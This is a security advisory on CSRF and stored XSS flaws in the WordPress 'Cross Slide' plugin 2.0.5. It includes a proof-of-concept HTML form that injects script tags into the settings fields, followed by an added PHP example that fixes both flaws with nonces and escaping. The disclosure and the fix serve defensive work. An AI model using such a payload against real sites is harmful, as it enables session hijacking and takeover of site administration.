WordPress Cross Slide plugin version 2.0.5 suffers from cross site request forgery and cross site scripting vulnerabilities.
caa03a6c9a143215c1d4269bc414496575d0db2bc33a311b7242be9b1c50217c
Title: WordPress 'Cross Slide' plugin - XSS/CSRF
Version: 2.0.5
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/crossslide-jquery-plugin-for-wordpress/
Contacted WordPress: 2015/01/26
==========================================================
## Plugin description:
==========================================================
The CrossSlide jQuery plugin for WordPress is designed to quickly add the JS and CSS requirements to operate the jQuery slideshow.
## CSRF:
==========================================================
It is possible to change the plugin's admin settings by tricking a logged-in admin into visiting a crafted page.
## Stored XSS:
==========================================================
Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.
PoC:
Log in as admin and submit this form:
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=thisismyurl_csj.php">
<input type="text" name="csj_width" value="800"/><script>alert(1)</script>"><br />
<input type="text" name="csj_height" value="800"/><script>alert(2)</script>"><br />
<input type="text" name="csj_sleep" value="800"/><script>alert(3)</script>"><br />
<input type="text" name="csj_fade" value="800"/><script>alert(4)</script>"><br />
<input type="text" name="upload_image" value="800"/><script>alert(5)</script>"><br />
<input type="submit">
</form>
## Solution
==========================================================
No fix available.
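
The following is an added example, not code from the plugin or from the advisory's authors. It sketches how a settings handler for the fields in the PoC could address both the CSRF and the stored XSS issues described above, using standard WordPress functions. The function names and nonce action are hypothetical, and storing each field as an option under its form name, with `upload_image` holding a URL, is an assumption.

```php
<?php
// Added example: runs only inside WordPress. Names prefixed csj_example_
// and the nonce action are hypothetical. Field names come from the PoC
// form; storing them as options under the same names is an assumption.

const CSJ_EXAMPLE_NONCE = 'csj_example_save_settings';
const CSJ_EXAMPLE_INTS  = array( 'csj_width', 'csj_height', 'csj_sleep', 'csj_fade' );

// Call at the top of the settings page callback, before rendering the form.
function csj_example_save_settings() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        return;
    }
    // CSRF: require an administrator and a valid per-user, per-action nonce.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( CSJ_EXAMPLE_NONCE ); // dies if the nonce is missing or invalid

    // Stored XSS, input side: numeric settings are reduced to non-negative integers.
    foreach ( CSJ_EXAMPLE_INTS as $key ) {
        if ( isset( $_POST[ $key ] ) ) {
            update_option( $key, absint( wp_unslash( $_POST[ $key ] ) ) );
        }
    }
    // Assumption: upload_image is an image URL, so it is stored as a cleaned URL.
    if ( isset( $_POST['upload_image'] ) ) {
        update_option( 'upload_image', esc_url_raw( wp_unslash( $_POST['upload_image'] ) ) );
    }
}

function csj_example_render_form() {
    echo '<form method="post">';
    wp_nonce_field( CSJ_EXAMPLE_NONCE ); // hidden _wpnonce field checked on save
    foreach ( array_merge( CSJ_EXAMPLE_INTS, array( 'upload_image' ) ) as $key ) {
        // Stored XSS, output side: escape every stored value for the attribute context,
        // so a payload like the one in the PoC cannot close the value attribute.
        printf(
            '<input type="text" name="%1$s" value="%2$s" /><br />',
            esc_attr( $key ),
            esc_attr( get_option( $key, '' ) )
        );
    }
    echo '<input type="submit" /></form>';
}
```

Escaping on output matters even with input sanitization in place, because values stored by the vulnerable version remain in the database until they are overwritten.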